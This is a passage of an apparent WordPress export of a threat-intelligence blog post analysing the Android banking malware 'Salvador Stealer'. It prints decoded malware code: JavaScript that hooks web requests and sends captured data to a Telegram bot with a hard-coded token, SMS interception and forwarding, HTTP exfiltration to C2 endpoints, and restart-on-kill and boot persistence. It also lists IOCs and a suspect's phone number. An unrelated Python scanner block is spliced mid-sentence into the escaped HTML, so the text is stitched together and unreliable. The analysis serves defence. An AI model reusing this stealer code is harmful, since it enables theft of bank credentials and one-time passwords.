<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">WebView-Based Phishing Page&nbsp;<\/h3>\n\n\n\n<p>Now that we\u2019ve decoded the files, we can begin our deeper analysis of base.apk.<\/p>\n\n\n\n<p>Let\u2019s start with Helene.java, which acts as the main activity of the application. It loads a webpage and handles runtime permissions. Upon launch, it checks for the necessary Android permissions and ensures there is an active internet connection.&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>@Override\npublic void onCreate(Bundle savedInstanceState) {\n    super.onCreate(savedInstanceState);\n    setContentView(R.layout.activity_ffff);\n    changeStatusBarColor(\"#4CAF50\");\n    ...\n    if (checkPermissions(this)) {\n        WebView webView = (WebView) findViewById(R.id.randomWebView);\n        setupWebView(this, webView);\n        initiateForegroundServiceIfRequired();\n    } else {\n        requestAppPermissions();\n    }\n}\n<\/code><\/pre>\n\n\n\n<p>This method sets up the UI, verifies permissions, and initializes a WebView. The setupWebView() method enables JavaScript and DOM storage, then loads the phishing page:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>public void setupWebView(Context context, final WebView webView) {\n    WebSettings settings = webView.getSettings();\n    settings.setJavaScriptEnabled(true);\n    settings.setDomStorageEnabled(true);\n    ...\n    webView.loadUrl(\"https:\/\/t15.muletipushpa.cloud\/page\/\");\n}<\/code><\/pre>\n\n\n\n<p>Once the page finishes loading, a malicious JavaScript payload is injected:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: pre-wrap\">String jsCode = \"eval(decodeURIComponent('%28%66%75%6e%63%74%69.....'));\";<\/code><\/pre>\n\n\n\n<p>After decoding, the JavaScript reveals that it hooks XMLHttpRequest.prototype.send, which web apps commonly use to send data (e.g., login credentials or session info).&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>(function() {\n    const originalSend = XMLHttpRequest.prototype.send;\n    XMLHttpRequest.prototype.send = function(data) {\n        try {\n            const botToken = \"7931012454:AAGdsBp3w5fSE9PxdrwNUopr3SU86mFQieE\";\n            const chatId = \"-1002480016557\";\n            const telegramUrl = `https:\/\/api.telegram.org\/bot${botToken}\/sendMessage`;\n            const telegramMessage = {\n                chat_id: chatId,\n                text: `Intercepted Data Sent:\\n${data}`\n            };\n            fetch(telegramUrl, {\n                method: 'POST',\n                headers: {\n                    'Content-Type': 'application\/json'\n                },\n                body: JSON.stringify(telegramMessage)\n            });\n        } catch (e) {\n            console.error(\"Error sending to Telegram:\", e);\n        }\n        return originalSend.apply(this, arguments);\n    };\n})();<\/code><\/pre>\n\n\n\n<p>It intercepts all AJAX\/XHR requests made from the loaded phishing page. 
These intercepted payloads are sent to a hardcoded Telegram chat via the Bot API.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">SMS Interception &amp; OTP Theft&nbsp;<\/h3>\n\n\n\n<p>After loading the phishing WebView, the app requests several Android permissions, including:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>RECEIVE_SMS<\/li>\n<li>SEND_SMS<\/li>\n<li>READ_SMS<\/li>\n<li>INTERNET<\/li>\n<\/ul>\n\n\n\n<p>These permissions are essential for the malware\u2019s goals: intercepting one-time passwords (OTPs) and forwarding them.&nbsp;<\/p>\n\n\n\n<p>Once the permissions are granted, the initiateForegroundServiceIfRequired() method is called, launching the Fitzgerald service.&nbsp;<br>This foreground service creates a fake notification (&#8220;Customer support&#8221;) and, more importantly, immediately registers a broadcast receiver to intercept incoming SMS:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>this.smsReceiver = new Earnestine(); \n\nregisterReceiver(this.smsReceiver, new IntentFilter(\"android.provider.Telephony.SMS_RECEIVED\")); 
<\/code><\/pre>\n\n\n\n<p>This is the real starting point of the OTP interception process. Every incoming message is captured and parsed by Earnestine. From the PDU, the malware extracts the message body, sender\u2019s number, and timestamp:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SmsMessage sms = SmsMessage.createFromPdu((byte&#91;]) pdu, \"3gpp\"); \n\nString messageBody = sms.getMessageBody(); \n\nString senderId = sms.getOriginatingAddress(); \n\nlong timestamp = sms.getTimestampMillis();<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Data Exfiltration Methods<\/h3>\n\n\n\n<p>The message is then stored using a map that groups multipart SMS messages together. Once it decides the message is complete and ready for exfiltration, the malware uses two separate mechanisms to forward it to the attacker:&nbsp;<\/p>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li><strong>Dynamic SMS forwarding: <\/strong>&nbsp;<\/li>\n<\/ol>\n\n\n\n<p>Inside a function named Bradford(), the malware contacts a remote server to retrieve a forwarding number.&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>String urlString = \"https:\/\/t15.muletipushpa.cloud\/json\/number.php\"; \n\n... \n\nString phoneNumber = jsonObject.optString(\"number\", \"\"); \n\nEarnestine.this.sendSMS(messageBody, phoneNumber); <\/code><\/pre>\n\n\n\n<p>This number is set by the attacker and can be changed at any time. If the server responds with enabled: true, the message is forwarded to that number using the standard SmsManager.&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>smsManager.sendTextMessage(phoneNumber, null, messageBody, null, null); <\/code><\/pre>\n\n\n\n<p>If the number is not available or the response is malformed, the malware will fall back to a previously saved one stored in SharedPreferences. It uses the key &#8220;Salvador&#8221; as the name of the preference file, and &#8220;forwardingNumber&#8221; as the key to retrieve the last known destination. 
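The decoded sources can be triaged for exactly these behaviours. The following Python scanner is an added example written for this article, not code from the Salvador sample or from ANY.RUN; it looks for the SMS-interception, SMS-forwarding, Telegram-exfiltration and restart-on-boot fragments quoted in this report, and its sample input, placeholder bot token and function names are constructed for the example.

```python
import os
import re
from typing import Dict, List

# Indicator patterns grouped by capability; each is lifted from a code
# fragment quoted in this report.
INDICATORS: Dict[str, List[str]] = {
    "sms_receive": [
        r"android\.provider\.Telephony\.SMS_RECEIVED",
        r"SmsMessage\.createFromPdu\(",
        r"\.getMessageBody\(\)",
    ],
    "sms_forward": [
        r"\.sendTextMessage\(",
    ],
    "http_exfil": [
        r"https?://[^\s\"']+/(?:post|number)\.php",
        r"api\.telegram\.org/bot",
    ],
    "persistence": [
        r"android\.intent\.action\.BOOT_COMPLETED",
        r"OneTimeWorkRequest\.Builder\(",
        r"startForegroundService\(",
    ],
    "webview_phish": [
        r"setJavaScriptEnabled\(true\)",
        r"\.loadUrl\(\"https?://",
        r"XMLHttpRequest\.prototype\.send",
    ],
}

URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s\"'`]*)?")
# Telegram bot tokens have the shape <bot id>:<35-char secret>; only the id is kept.
BOT_TOKEN_RE = re.compile(r"bot(\d{8,10}):([A-Za-z0-9_-]{35})")
PREFS_RE = re.compile(r"getSharedPreferences\(\"([^\"]+)\"")


def defang(url: str) -> str:
    """Rewrite a URL so it cannot be clicked by accident: hxxps://host[.]tld/path."""
    scheme, rest = url.split("://", 1)
    host, _, path = rest.partition("/")
    out = f"{scheme.replace('http', 'hxxp')}://{host.replace('.', '[.]')}"
    return f"{out}/{path}" if path else out


def scan_source(java_text: str) -> dict:
    """Scan one decoded source file: matched indicator groups, defanged
    hard-coded URLs, SharedPreferences file names and redacted bot ids."""
    hits = {group: sorted(p for p in pats if re.search(p, java_text))
            for group, pats in INDICATORS.items()}
    urls = sorted({defang(BOT_TOKEN_RE.sub(r"bot\1:<redacted>", u))
                   for u in URL_RE.findall(java_text)})
    bot_ids = sorted({f"{bot_id}:<redacted>" for bot_id, _ in BOT_TOKEN_RE.findall(java_text)})
    prefs = sorted(set(PREFS_RE.findall(java_text)))
    return {"hits": hits, "urls": urls, "bot_tokens": bot_ids, "prefs": prefs}


def verdict(report: dict) -> str:
    """Only an SMS receive path combined with an outbound channel is labelled
    otp_stealer; either alone (or bare persistence) is merely suspicious."""
    hits = report["hits"]
    receives = bool(hits["sms_receive"])
    exfil = bool(hits["sms_forward"] or hits["http_exfil"])
    if receives and exfil:
        return "otp_stealer"
    if receives or exfil or hits["persistence"]:
        return "suspicious"
    return "clean"


def triage_tree(base_dir: str = ".") -> Dict[str, str]:
    """Apply the scan to every *_decoded.java file written by the decoder above."""
    results: Dict[str, str] = {}
    for root, _, files in os.walk(base_dir):
        for name in files:
            if name.endswith("_decoded.java"):
                path = os.path.join(root, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    results[path] = verdict(scan_source(fh.read()))
    return results


# Constructed sample imitating the decoded Earnestine/Fitzgerald/Ellsworth
# fragments quoted in the report; the bot token is a placeholder, not the real one.
PLACEHOLDER_TOKEN = "0000000000:" + "A" * 35
SAMPLE_STEALER = """
registerReceiver(this.smsReceiver, new IntentFilter("android.provider.Telephony.SMS_RECEIVED"));
SmsMessage sms = SmsMessage.createFromPdu((byte[]) pdu, "3gpp");
String messageBody = sms.getMessageBody();
String urlString = "https://t15.muletipushpa.cloud/json/number.php";
smsManager.sendTextMessage(phoneNumber, null, messageBody, null, null);
SharedPreferences sp = context.getSharedPreferences("Salvador", 0);
if (intent.getAction().equals("android.intent.action.BOOT_COMPLETED")) { }
String js = "https://api.telegram.org/bot%s/sendMessage";
""" % PLACEHOLDER_TOKEN
# Constructed benign control: a WebView that only loads a bundled asset.
SAMPLE_BENIGN = 'webView.loadUrl("file:///android_asset/index.html");'

if __name__ == "__main__":
    for label, src in (("stealer", SAMPLE_STEALER), ("benign", SAMPLE_BENIGN)):
        rep = scan_source(src)
        print(label, verdict(rep), rep["urls"], rep["prefs"], rep["bot_tokens"])
```

Run it from the directory holding the _decoded.java output, or call triage_tree() on that path, to get a verdict per file; the verdict deliberately requires both a receive path and an outbound channel so a legitimate SMS app is not flagged.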
&nbsp;<\/p>\n\n\n\n<p>This use of &#8220;Salvador&#8221; as a unique identifier for internal storage is what led us to name this malware Salvador Stealer:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SharedPreferences sharedPreferences = context.getSharedPreferences(\"Salvador\", 0); \n\nString savedPhoneNumber = sharedPreferences.getString(\"forwardingNumber\", \"\"); <\/code><\/pre>\n\n\n\n<p>This suggests the malware is designed to persist attacker-supplied configuration data between sessions, allowing it to continue exfiltrating OTPs even when the server is unreachable or temporarily offline.&nbsp;<\/p>\n\n\n\n<ol start=\"2\" class=\"wp-block-list\">\n<li><strong>HTTP-Based Fallback<\/strong>&nbsp;<\/li>\n<\/ol>\n\n\n\n<p>Through another method called Randall(), the malware constructs a JSON payload containing the sender ID, message content, and timestamp:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>jsonData.put(\"sender_id\", senderId); \n\njsonData.put(\"message\", messageBody); \n\njsonData.put(\"timestamp\", timestamp); <\/code><\/pre>\n\n\n\n<p>This data is then sent in a POST request to another hardcoded endpoint:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>String apiUrl = \"https:\/\/t15.muletipushpa.cloud\/post.php\";<\/code><\/pre>\n\n\n\n<p>By using both SMS and HTTP as parallel delivery channels, the malware increases its chances of reliably delivering OTPs or any sensitive codes it intercepts, ensuring the attacker receives them regardless of connectivity issues or SMS blocking.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Persistence Mechanism&nbsp;<\/h3>\n\n\n\n<p>Even if the user or system tries to terminate the app\u2019s background service, the malware is programmed to automatically restart it. 
When the Fitzgerald service is killed or swiped away, it immediately schedules a recovery task using Android\u2019s WorkManager:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>WorkRequest serviceRestartWork = new OneTimeWorkRequest.Builder(Mauricio.class) \n\n    .setInitialDelay(1L, TimeUnit.SECONDS) \n\n    .build(); \n\nWorkManager.getInstance(getApplicationContext()).enqueue(serviceRestartWork); <\/code><\/pre>\n\n\n\n<p>The scheduled worker points to the Mauricio class. Inside, it simply relaunches Fitzgerald:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Intent Pasquale = new Intent(getApplicationContext(), Fitzgerald.class); \n\ngetApplicationContext().startForegroundService(Pasquale); <\/code><\/pre>\n\n\n\n<p>This way, even if the user tries to shut the app down from the task manager or system settings, the malware silently revives itself within seconds.&nbsp;<\/p>\n\n\n\n<p>If the device itself is rebooted, the malware still survives. A separate class named Ellsworth is responsible for this behavior. 
It listens for the system-wide BOOT_COMPLETED broadcast and triggers the Fitzgerald service again:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>public class Ellsworth extends BroadcastReceiver { \n\n    @Override \n\n    public void onReceive(Context context, Intent intent) { \n\n        if (intent.getAction().equals(\"android.intent.action.BOOT_COMPLETED\")) { \n\n            Intent serviceIntent = new Intent(context, (Class&lt;?&gt;) Fitzgerald.class); \n\n            context.startService(serviceIntent); \n\n        } \n\n    } \n\n} <\/code><\/pre>\n\n\n\n<p>This guarantees that the malware regains control after reboot and resumes intercepting SMS messages immediately.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Interesting Findings&nbsp;<\/h2>\n\n\n\n<p>During our analysis, we identified that the fake banking interface used by Salvador Stealer is actually a phishing website embedded inside the Android application.<br>The phishing page can be accessed directly at:&nbsp;<br>\ud83d\udc49 hxxxs:\/\/t15[.]muletipushpa[.]cloud\/page\/start[.]php&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"506\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image22-1024x506.png\" alt=\"\" class=\"wp-image-12466\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image22-1024x506.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image22-300x148.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image22-768x379.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image22-1536x759.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image22-370x183.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image22-270x133.png 270w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image22-740x366.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image22.png 1903w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Phishing page that encourages victims to share their personal data<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>We also detected another phishing page hosted on a different subdomain, following a pattern with incremental digits\u2014from&nbsp;t01.*&nbsp;up to&nbsp;t15.* &nbsp;<\/p>\n\n\n\n<p>At the time of writing, the attacker has also left the admin panel accessible to anyone.&nbsp;<\/p>\n\n\n\n<p>The admin login page is publicly available at:&nbsp;<br>\ud83d\udc49 hxxxs:\/\/t15[.]muletipushpa[.]cloud\/admin\/login[.]php&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"501\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image16-1024x501.png\" alt=\"\" class=\"wp-image-12468\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image16-1024x501.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image16-300x147.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image16-768x376.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image16-1536x752.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image16-370x181.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image16-270x132.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image16-740x362.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/image16.png 1919w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Admin login page available to 
everyone<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Brute-forcing the admin login panel reveals a message prompting the user to contact a WhatsApp number, likely belonging to the developer of this phishing malware.&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>hxxxs:\/\/api&#91;.]whatsapp&#91;.]com\/send\/?phone=916306285085&amp;text&amp;type=phone_number&amp;app_absent=0<\/code><\/pre>\n\n\n\n<p>Exposed phone number: +916306285085&nbsp;<br>This suggests that the attacker is either based in India or using an Indian phone number as a disguise.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Salvador Threat Impact&nbsp;<\/h2>\n\n\n\n<p>The Salvador Stealer campaign poses a serious risk to both individuals and organizations:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>For end users:<\/strong>&nbsp;Victims risk financial fraud, identity theft, and unauthorized access to their banking accounts.<\/li>\n<li><strong>For financial institutions:<\/strong>&nbsp;This malware undermines customer trust, increases fraud cases, and may lead to reputational damage.<\/li>\n<li><strong>For security teams:<\/strong>&nbsp;Salvador Stealer\u2019s layered infection chain, real-time data exfiltration, and SMS interception tactics make detection difficult without advanced analysis tools.<\/li>\n<li><strong>For the mobile ecosystem:<\/strong>&nbsp;The use of legitimate-looking banking apps and embedded phishing pages highlights the growing trend of sophisticated Android-based social engineering attacks.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Conclusion&nbsp;<\/h2>\n\n\n\n<p>The analysis of Salvador Stealer reveals how modern Android malware combines phishing, credential theft, and advanced persistence techniques to compromise sensitive financial data. 
Threats like this highlight the increasing complexity of mobile malware and the growing challenge of detecting and stopping them before damage is done.&nbsp;<\/p>\n\n\n\n<p>By analyzing Salvador Stealer in real time using&nbsp;<a href=\"https:\/\/any.run\/cybersecurity-blog\/android-malware-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN\u2019s Android sandbox<\/a>, we were able to fully map its behavior, uncover its infrastructure, and extract key indicators in just minutes\u2014something that would otherwise require hours of manual static analysis.&nbsp;<\/p>\n\n\n\n<p>Here\u2019s how analysis like this can bring value:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Faster threat detection:<\/strong>&nbsp;Quickly identify malicious behaviors and communication patterns.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Complete visibility:<\/strong>&nbsp;Observe real-time actions of mobile malware, including data exfiltration and persistence tactics.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Reduced investigation time:<\/strong>&nbsp;Automate and accelerate the technical analysis process.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Improved response:<\/strong>&nbsp;Provide clear, actionable Indicators of Compromise (IOCs) for threat hunting and incident response.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Enhanced threat intelligence:<\/strong>&nbsp;Expose attacker infrastructure and techniques that may be used in future campaigns.&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>Effective defense starts with better visibility. 
Tools like ANY.RUN\u2019s sandbox make real-time threat analysis actionable and accessible to everyone.&nbsp;<\/p>\n\n\n\n<p><a href=\"http:\/\/app.any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=salvador_malware_analysis&amp;utm_term=010425&amp;utm_content=linktoregistration#register\/\" target=\"_blank\" rel=\"noreferrer noopener\">Try ANY.RUN\u2019s Android Sandbox now<\/a>&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Indicators of Compromise (IOC)<\/strong>&nbsp;<\/h2>\n\n\n\n<p>\ud83d\udd17 Phishing URL:&nbsp;<\/p>\n\n\n\n<p>\ud83d\udce1 C2 Server (Telegram Bot):&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>hxxs:\/\/api[.]telegram[.]org\/bot7931012454:AAGdsBp3w5fSE9PxdrwNUopr3SU86mFQieE&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>\ud83d\udd0d File Hashes:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>INDUSLND_BANK_E_KYC.apk&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>SHA256: 21504D3F2F3C8D8D231575CA25B4E7E0871AD36CA6BBB825BF7F12BFC3B00F5A&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Base.apk&nbsp;<br>SHA256: &nbsp;<br>7950CC61688A5BDDBCE3CB8E7CD6BEC47EEE9E38DA3210098F5A5C20B39FB6D8&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>Threat actor\u2019s phone number:&nbsp;<\/p>\n\n\n\n<ul 
class=\"wp-block-list\">\n<li>+916306285085&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">About ANY.RUN<\/h2>\n\n\n\n<p><a href=\"http:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=salvador_malware_analysis&amp;utm_term=010425&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a> helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, <a href=\"https:\/\/any.run\/cybersecurity-blog\/introducing-any-run-threat-intelligence-lookup\/\" target=\"_blank\" rel=\"noreferrer noopener\">TI Lookup<\/a>, <a href=\"https:\/\/any.run\/cybersecurity-blog\/yara-search\/\" target=\"_blank\" rel=\"noreferrer noopener\">YARA Search<\/a>, and <a href=\"https:\/\/any.run\/cybersecurity-blog\/threat-intelligence-feeds\/\" target=\"_blank\" rel=\"noreferrer noopener\">Feeds<\/a>, help you find IOCs or files to learn more about the threats and respond to incidents faster.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this report, we examine an Android malware sample recently collected and analyzed by our team. This malware masquerades as a banking application and is built to steal sensitive user information. 
During the analysis, we came across internal references to &#8220;Salvador,&#8221; so we decided to name it Salvador Stealer.&nbsp; Real-time visibility into mobile malware behavior [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":12493,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":"[]"},"categories":[8],"tags":[57,10,15,34,40],"class_list":["post-12413","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-anyrun","tag-cybersecurity","tag-malware","tag-malware-analysis","tag-malware-behavior"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.10 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Salvador Stealer: Analysis of New Mobile Banking Malware<\/title>\n<meta name=\"description\" content=\"Discover detailed analysis of Salvador Stealer, a new Android malware targeting users of mobile banking apps.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Achmad Adhikara\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"14 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/\"},\"author\":{\"name\":\"Achmad Adhikara\",\"@id\":\"https:\/\/any.run\/\"},\"headline\":\"Salvador Stealer: New Android Malware That Phishes Banking Details &amp; OTPs\",\"datePublished\":\"2025-04-01T10:50:42+00:00\",\"dateModified\":\"2025-04-02T05:49:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/\"},\"wordCount\":2592,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"keywords\":[\"ANYRUN\",\"cybersecurity\",\"malware\",\"malware analysis\",\"malware behavior\"],\"articleSection\":[\"Malware Analysis\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/\",\"name\":\"Salvador Stealer: Analysis of New Mobile Banking Malware\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/\"},\"datePublished\":\"2025-04-01T10:50:42+00:00\",\"dateModified\":\"2025-04-02T05:49:54+00:00\",\"description\":\"Discover detailed analysis of Salvador Stealer, a new Android malware targeting users of mobile banking 
apps.\",\"breadcrumb\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malware Analysis\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Salvador Stealer: New Android Malware That Phishes Banking Details &amp; OTPs\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN&#039;s Cybersecurity Blog\",\"description\":\"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.\",\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/any.run\/?s={search_term_string}\"},\"query-input\":\"required 
name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN\",\"url\":\"https:\/\/any.run\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"width\":1,\"height\":1,\"caption\":\"ANY.RUN\"},\"image\":{\"@id\":\"https:\/\/any.run\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/www.any.run\/\",\"https:\/\/twitter.com\/anyrun_app\",\"https:\/\/www.linkedin.com\/company\/30692044\",\"https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"Achmad Adhikara\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/Adhikara-1.jpg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/04\/Adhikara-1.jpg\",\"caption\":\"Achmad Adhikara\"},\"description\":\"Achmad Adhikara is a threat hunter at ANY.RUN. Former red teamer. I chase threats. I prefer to stay below periscope depth. fnord.\",\"url\":\"#molongui-disabled-link\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Salvador Stealer: Analysis of New Mobile Banking Malware","description":"Discover detailed analysis of Salvador Stealer, a new Android malware targeting users of mobile banking apps.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/any.run\/cybersecurity-blog\/salvador-stealer-malware-analysis\/","twitter_misc":{"Written by":"Achmad Adhikara","Est. 
